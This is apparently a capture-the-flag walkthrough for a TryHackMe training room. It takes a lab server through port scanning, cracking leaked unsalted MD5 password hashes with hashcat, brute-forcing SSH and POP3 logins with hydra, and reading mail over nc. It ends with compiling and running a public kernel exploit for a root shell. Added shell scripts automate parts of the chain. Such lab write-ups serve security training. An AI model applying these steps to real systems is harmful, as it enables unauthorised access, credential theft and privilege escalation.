This room is available on TryHackMe at https://tryhackme.com/room/ctf
Reconnaissance
The first thing to do is always a port scan of all 65535 TCP ports, to see what is running on the server.
sudo nmap -sS -p- -T4 x.x.x.x -vv
- -sS for a SYN (half-open) scan
- -p- to scan all 65535 ports
- -T4 for the aggressive timing template: fast, but noisy
- -vv for very verbose output, so we can follow the progress of the scan
Which gives us the following:
- PORT STATE SERVICE REASON
- 22/tcp open ssh syn-ack ttl 63
- 80/tcp open http syn-ack ttl 63
- 110/tcp open pop3 syn-ack ttl 63
- 143/tcp open imap syn-ack ttl 63
Now let's find out a little more about those specific ports.
sudo nmap -sS -sV -p22,80,110,143 -T4 x.x.x.x -vv
- -sS for a SYN (half-open) scan
- -sV to get the version of the software running on the ports
- -p22,80,110,143 to only scan the ports we previously found
- -T4 for the aggressive timing template: fast, but noisy
- -vv for very verbose so we can follow the progress of the scan
Which gives us the following:
- PORT STATE SERVICE REASON VERSION
- 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
- 110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
- 143/tcp open imap syn-ack ttl 63 Dovecot imapd
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
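The glue between the two nmap runs above, as an added example that is not part of the original writeup: the full-range scan's "PORT STATE SERVICE" lines are parsed into the comma-separated port list that the targeted -sV scan takes, so the second command does not have to be typed by hand. It assumes the first scan's normal output was saved with -oN (the file name full.nmap is an assumption), and the sample scan text is constructed in the shape of the output shown above.

```shell
#!/bin/sh
# Added example (not from the original writeup): turn nmap's normal output
# into the "-p22,80,110,143" list used by the follow-up version scan.

# Constructed sample in the shape of the first scan's output; the last
# line is added to show that non-open ports are dropped.
SAMPLE_SCAN='PORT    STATE    SERVICE    REASON
22/tcp  open     ssh        syn-ack ttl 63
80/tcp  open     http       syn-ack ttl 63
110/tcp open     pop3       syn-ack ttl 63
143/tcp open     imap       syn-ack ttl 63
8080/tcp filtered http-proxy no-response'

# Read nmap normal output on stdin; print only ports whose STATE is
# exactly "open" (closed/filtered are ignored), joined with commas.
# Prints nothing at all when no port is open.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
             split($1, p, "/")
             ports = ports (ports ? "," : "") p[1]
         }
         END { if (ports) print ports }'
}

# Usage against a real scan (assumed file name full.nmap):
#   sudo nmap -sS -p- -T4 -oN full.nmap x.x.x.x -vv
#   sudo nmap -sS -sV -p "$(open_ports < full.nmap)" -T4 x.x.x.x -vv
printf '%s\n' "$SAMPLE_SCAN" | open_ports
```

Guarding on the exact word "open" matters: nmap also prints "open|filtered" for UDP and some firewalled TCP ports, and feeding those to -sV wastes time on ports that may not answer at all.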
So we know it's running a web server. Let's see what the website looks like when we visit http://x.x.x.x

Well, that's not a good sign, but let's see what else we can find.
dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt
- ---- Scanning URL: http://x.x.x.x/ ----
- ==> DIRECTORY: http://x.x.x.x/assets/
- ==> DIRECTORY: http://x.x.x.x/images/
- + http://x.x.x.x/index.html (CODE:200|SIZE:2629)
- + http://x.x.x.x/robots.txt (CODE:200|SIZE:26)
- + http://x.x.x.x/server-status (CODE:403|SIZE:300)
- ---- Entering directory: http://x.x.x.x/assets/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
- ---- Entering directory: http://x.x.x.x/images/ ----
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode '-w' if you want to scan it anyway)
The only possibly interesting find is robots.txt, and visiting http://x.x.x.x/robots.txt doesn't give us anything. Back on the website, the page says that the company's Twitter handle (https://twitter.com/fowsniffcorp?lang=en) has been hijacked and that the attackers may release sensitive information, so let's see if they did.

And it looks like they have released the company's email usernames and password hashes on Pastebin, available at https://pastebin.com/NrAqVeeX

Password Cracking
Save the contents to a text file somewhere, then strip the "@fowsniff" from each line using sed, grep, Excel, or a text editor of your choice. Note that hashcat expects one bare hash per line: either keep only the hash part after the colon, or leave the lines as user:hash and add --username to the command below.
The paste mentions that the passwords are only hashed with MD5 (have a look at https://en.wikipedia.org/wiki/MD5 for more information), unsalted, so we can use hashcat to hopefully recover some of them.
hashcat -m 0 fowsniff.txt /usr/share/wordlists/rockyou.txt
- -m 0 tells hashcat the hashes are raw MD5
- fowsniff.txt is where I saved the hashes
- /usr/share/wordlists/rockyou.txt is a favourite wordlist of likely passwords
A few minutes later we should have 8 of the 9 passwords (rerun the same command with --show to print the cracked hash:password pairs). Looks like they don't take password security very seriously.
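The bookkeeping around the hashcat run, as an added example that is not part of the original writeup: the leaked lines look like user@fowsniff:md5hex, hashcat -m 0 wants bare hashes, and the hydra step that follows wants one file of usernames and one of cracked passwords. The three helpers below produce exactly those lists; the sample leak is constructed (the hashes are MD5 of "password" and of "hello", not the real values from the paste), and the --show output format (hash:plaintext) is hashcat's.

```shell
#!/bin/sh
# Added example (not from the original writeup): reshape the leaked
# "user@fowsniff:hash" lines for hashcat, and hashcat's "--show" output
# for hydra's -L/-P lists.

# Constructed sample in the shape of the leak. The hashes are md5("password")
# and md5("hello"), not the real leak; the last line shows that junk is skipped.
SAMPLE_LEAK='alice@fowsniff:5f4dcc3b5aa765d61d8327deb882cf99
bob@fowsniff:5d41402abc4b2a76b9719d911017c592
# stray comment line that should be ignored'

# Usernames only: the part before "@", taken from lines that end in a
# 32-hex-digit MD5. Feed to "hydra -L".
leak_users() {
    sed -n 's/^\([^@:#][^@:]*\)@[^:]*:[0-9A-Fa-f]\{32\}[[:space:]]*$/\1/p'
}

# Bare lowercase hashes, one per line, for "hashcat -m 0 hashes.txt rockyou.txt".
leak_hashes() {
    sed -n 's/^[^:#][^:]*:\([0-9A-Fa-f]\{32\}\)[[:space:]]*$/\1/p' | tr 'A-F' 'a-f'
}

# Passwords from "hashcat -m 0 hashes.txt --show", whose lines are
# "hash:plaintext". Only the first ":" splits the line, so a password that
# itself contains ":" survives. Uncracked hashes never appear in --show
# output, so nothing has to be filtered. Feed to "hydra -P".
cracked_passwords() {
    sed -n 's/^[0-9A-Fa-f]\{32\}:\(.*\)$/\1/p'
}

# Usage (assumed file names):
#   printf '%s\n' "$SAMPLE_LEAK" | leak_users  > fowsniff-users.txt
#   printf '%s\n' "$SAMPLE_LEAK" | leak_hashes > hashes.txt
#   hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
#   hashcat -m 0 hashes.txt --show | cracked_passwords > fowsniff-pass.txt
printf '%s\n' "$SAMPLE_LEAK" | leak_users
printf '%s\n' "$SAMPLE_LEAK" | leak_hashes
```

Because hydra -L/-P tries every username against every password, the two lists do not need to line up. If you want the one-to-one user:password pairs instead (for example to try each account with only its own leaked password), keep the user:hash form, crack with --username, and read --show, which then prints user:hash:plaintext.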
Remote Attacks
We know that the server runs SSH, so let's see if any of the passwords we cracked work. Hydra is the perfect tool for this.
hydra -L fowsniff-users.txt -P fowsniff-pass.txt x.x.x.x ssh
- -L fowsniff-users.txt is the list of usernames taken from the hash file
- -P fowsniff-pass.txt is the list of passwords we cracked from the hash file
- ssh tells hydra to attempt the logins over SSH
Which gives us the following:
- Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-26 08:44:24
- [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
- [DATA] max 16 tasks per 1 server, overall 16 tasks, 72 login tries (l:9/p:8), ~5 tries per task
- [DATA] attacking ssh://x.x.x.x:22/
- 1 of 1 target completed, 0 valid password found
- Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-26 08:44:46
And none of the passwords work for SSH. (Take hydra's warning seriously: with 16 parallel tasks sshd can drop connections, so before concluding that a list has no hits, rerun with -t 4.)
But we also saw an open POP3 port, so let's see if we can log in there and, if we can, whether there is any useful information in an email. So back to hydra.
hydra -L fowsniff-users.txt -P fowsniff-pass.txt x.x.x.x pop3
And we have a winner: user seina hasn't changed their password.
Email Info Extraction
We can log in to the POP3 server with that username and password using telnet or nc. nc is the better choice, as telnet isn't installed by default. POP3 on port 110 is plain text, so the credentials and the mail itself cross the wire unencrypted.
ElectricToolBox has a list of useful commands to run from the console to list and read emails on a POP3 server: https://electrictoolbox.com/pop3-commands/
nc x.x.x.x 110
And what we find is interesting.
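The POP3 exchange behind that nc session, as an added example that is not part of the original writeup: one function emits the client side (USER, PASS, LIST, RETR, QUIT) so it can be piped into nc instead of typed by hand, and another pulls the message numbers out of the server's LIST reply so they can be fed back as RETR arguments. The server transcript is constructed in the shape of a Dovecot reply; the example assumes plain USER/PASS authentication without STARTTLS, and that the server accepts the pipelined commands (Dovecot advertises PIPELINING).

```shell
#!/bin/sh
# Added example (not from the original writeup): script the POP3 session
# that the writeup drives interactively with "nc x.x.x.x 110".

# Emit the client side of a POP3 session. Lines end in CRLF per the
# protocol. $1 = user, $2 = password, remaining args = message numbers
# to retrieve (none means "just list the mailbox").
pop3_session() {
    user=$1
    pass=$2
    shift 2
    printf 'USER %s\r\n' "$user"
    printf 'PASS %s\r\n' "$pass"
    printf 'LIST\r\n'
    for n in "$@"; do
        printf 'RETR %s\r\n' "$n"
    done
    printf 'QUIT\r\n'
}

# Constructed sample of what the server answers to USER, PASS and LIST.
# The LIST reply is multi-line: "+OK", one "<msgnum> <octets>" per
# message, terminated by a line holding a single ".".
SAMPLE_LIST_REPLY='+OK Dovecot ready.
+OK
+OK Logged in.
+OK 2 messages:
1 1622
2 1280
.'

# Read a server transcript on stdin; print the message numbers from the
# LIST reply, space-separated, e.g. "1 2". Status lines ("+OK ...") and
# the terminating "." are skipped.
pop3_list_ids() {
    tr -d '\r' |
        awk 'NF == 2 && $1 ~ /^[0-9]+$/ && $2 ~ /^[0-9]+$/ {
                 printf "%s%s", sep, $1
                 sep = " "
             }'
}

# Usage against the real box (credentials and IP as found above):
#   pop3_session seina 'the-cracked-password' | nc -w 5 x.x.x.x 110 | tee list.txt
#   pop3_session seina 'the-cracked-password' $(pop3_list_ids < list.txt) | nc -w 5 x.x.x.x 110
pop3_session alice secret 1
printf '%s\n' "$SAMPLE_LIST_REPLY" | pop3_list_ids
```

The two-pass usage (LIST first, then RETR for every number returned) is what makes this safe against mailboxes of unknown size; -w on nc closes the connection once the server has gone quiet, so QUIT being answered ends the run cleanly.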
Exploitation
Let's log in to the server with those details
ssh user@x.x.x.x
And we are in. First, check what sudo lets this account run:
sudo -l
sudo doesn't give us anything to run with root privileges, so let's learn a little bit more about the server.
uname -a
And we see that this is an old version of Ubuntu. Let's see if ExploitDB has anything we can use:
searchsploit linux kernel 4.4.0

The Local Privilege Escalation looks like it might work. Before relying on a kernel exploit, check that the target's kernel (from uname -r) actually falls inside the version range named in the exploit's title.
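That version check, as an added example that is not part of the original writeup: ExploitDB kernel exploits carry titles of the form "Linux Kernel < A.B.C-NNN ...", and Ubuntu's uname -r reads like "4.4.0-31-generic", so a small comparison on the major.minor.patch-abi tuple tells you whether the box is in range before you compile anything. The version strings used as input are constructed examples; the "4.4.0-116" threshold below is an assumed illustration, not a value taken from the page.

```shell
#!/bin/sh
# Added example (not from the original writeup): compare the target's
# "uname -r" with the upper bound in an exploit's title before using it.

# Normalise a kernel string such as "4.4.0-31-generic" or "4.4.0-116" into
# "major minor patch abi". Any flavour suffix (-generic, -aws, ...) is
# dropped and missing fields become 0, so "5.4.0" sorts as 5 4 0 0.
kernel_tuple() {
    printf '%s\n' "$1" |
        sed 's/-[a-z].*$//; s/[-.]/ /g' |
        awk '{ printf "%d %d %d %d\n", $1, $2, $3, $4 }'
}

# Exit 0 when kernel $1 is strictly older than kernel $2, 1 otherwise
# (equal versions are not "older", matching a "< X" title).
kernel_older_than() {
    set -- "$(kernel_tuple "$1")" "$(kernel_tuple "$2")"
    printf '%s\n%s\n' "$1" "$2" |
        awk '
            NR == 1 { split($0, a, " ") }
            NR == 2 { split($0, b, " ") }
            END {
                for (i = 1; i <= 4; i++) {
                    if (a[i] + 0 < b[i] + 0) exit 0
                    if (a[i] + 0 > b[i] + 0) exit 1
                }
                exit 1
            }'
}

# Usage on the target, with the bound copied from the searchsploit title
# (assumed value here):
#   if kernel_older_than "$(uname -r)" 4.4.0-116; then echo "in range"; fi
for k in 4.4.0-31-generic 4.4.0-116-generic 4.15.0-20-generic; do
    if kernel_older_than "$k" 4.4.0-116; then
        echo "$k: older than 4.4.0-116, exploit may apply"
    else
        echo "$k: not in range"
    fi
done
```

The ABI number after the dash is the part that matters on Ubuntu: distribution kernels backport fixes without bumping the upstream 4.4.0 version, so comparing only "4.4.0" would flag patched boxes as vulnerable.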
Let's copy the .c file to our home directory (searchsploit -m 44298 does the same copy into the current directory)
cp /usr/share/exploitdb/exploits/linux/local/44298.c /home/kali
and now let's compile it
gcc 44298.c
Which gives us a file named a.out (pass -o to gcc if you want a friendlier name). Now let's transfer it to the victim machine. You can use nc to do this, or scp over the SSH login we already have, but I am lazy and use FileZilla (sudo apt-get install filezilla if it's not installed). If the binary refuses to start on the target because of a glibc mismatch, compile it on the target instead, provided gcc is installed there.
After that, run the command
./a.out
And it will drop you into a root shell. You can confirm this by running
whoami
Then change directory to /root/ and read the file flag.txt

And you are done. Congratulations on getting the root flag.